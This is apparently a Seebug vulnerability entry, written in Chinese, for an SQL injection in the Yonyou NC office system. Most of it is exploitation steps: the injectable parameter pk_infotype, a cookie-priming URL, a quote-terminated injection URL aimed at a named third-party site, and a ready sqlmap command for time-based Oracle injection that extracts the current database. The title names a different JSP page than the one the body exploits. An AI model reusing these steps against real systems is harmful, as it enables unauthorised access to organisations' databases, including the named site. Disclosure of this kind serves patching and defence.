用友NC综合办公系统 /epp/html/nodes/upload/SupdocDo.jsp SQL注入漏洞

2015-10-10T00:00:00
ID SSV:89654
Type seebug
Reporter Root
Modified 2015-10-10T00:00:00

Description

用友NC综合办公系统SQL注入漏洞,可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库

注入链接:/epp/detail/publishinfomore.jsp?pk_infotype=

注入参数:pk_infotype

必须先访问/epp/index.jsp后产生cookie才能进行SQL注入

测试案例:

http://nc.xhlbdc.com

访问首页产生cookie: http://nc.xhlbdc.com/epp/index.jsp

注入链接:http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'

【SQLMAP注入】

burpsuite抓包保存为nc.xhlbdc.com.txt文件后,使用SQLMAP注入:

python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3